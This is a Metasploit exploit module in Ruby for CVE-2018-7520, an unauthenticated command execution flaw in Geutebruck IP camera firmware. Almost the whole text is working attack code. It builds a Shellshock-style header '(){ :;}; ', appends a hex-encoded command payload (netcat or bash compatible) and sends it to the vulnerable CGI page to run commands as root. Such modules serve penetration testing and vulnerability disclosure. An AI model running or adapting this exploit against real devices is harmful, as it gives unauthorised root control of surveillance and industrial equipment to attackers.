1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 |
## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'Geutebruck simple_loglistjs.cgi Remote Command Execution', 'Description'=> %q{ This module exploits a an arbitrary command execution vulnerability. The vulnerability exists in the /uapi-cgi/viewer/simple_loglistjs.cgi page and allows an anonymous user to execute arbitrary commands with root privileges. Firmware <= 1.12.0.19 are concerned. Tested on 5.02024 G-Cam/EFD-2250 running 1.12.0.4 firmware. }, 'Author' => [ 'Nicolas Mattiocco', #CVE-2018-7520 (RCE) 'Davy Douhine' #CVE-2018-7520 (RCE) and metasploit module ], 'License'=> MSF_LICENSE, 'References' => [ [ 'CVE', '2018-7520' ], [ 'URL', 'http://geutebruck.com' ], [ 'URL', 'https://ics-cert.us-cert.gov/advisories/ICSA-18-079-01' ] ], 'Privileged' => false, 'Payload'=> { 'DisableNops' => true, 'Space' => 1024, 'Compat'=> { 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic netcat bash', } }, 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Targets'=> [[ 'Automatic', { }]], 'DefaultTarget'=> 0, 'DisclosureDate' => 'Mar 20 2018')) register_options( [ OptString.new('TARGETURI', [true, 'The base path to webapp', '/uapi-cgi/viewer/simple_loglistjs.cgi']), ], self.class) end def exploit header = "(){ :;}; " encpayload = "#{header}#{payload.encoded}" uri = target_uri.path + "?" + Rex::Text.uri_encode(encpayload, "hex-all") print_status("#{rhost}:#{rport} - Attempting to exploit...") res = send_request_raw( { 'method' => 'GET', 'uri'=> uri }) end end |